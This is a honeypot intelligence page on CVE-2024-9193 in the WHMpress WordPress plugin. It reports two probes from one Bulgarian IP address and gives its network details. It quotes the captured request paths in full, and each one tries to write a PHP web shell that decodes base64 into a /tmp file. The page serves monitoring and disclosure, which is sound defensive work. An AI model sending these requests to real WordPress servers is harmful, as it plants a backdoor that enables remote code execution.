CVE-2024-9193: WHMpress <= 6.3-revision-0 - Unauthenticated Local File Inclusion to Arbitrary Options Update

HoneyLabs honeypots recorded 2 probes matching CVE-2024-9193 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.

Request paths that identify it

  • /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/.php

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited21

Captured requests

  • /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/3K2WNOXYbJFLzgZUHchH3XTcf8m.php
  • /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/3JxN8g4ozu1SkeXERDO9vPpJrC3.php

CVE report

CVE report

Open a specific CVE from the CVE tracker.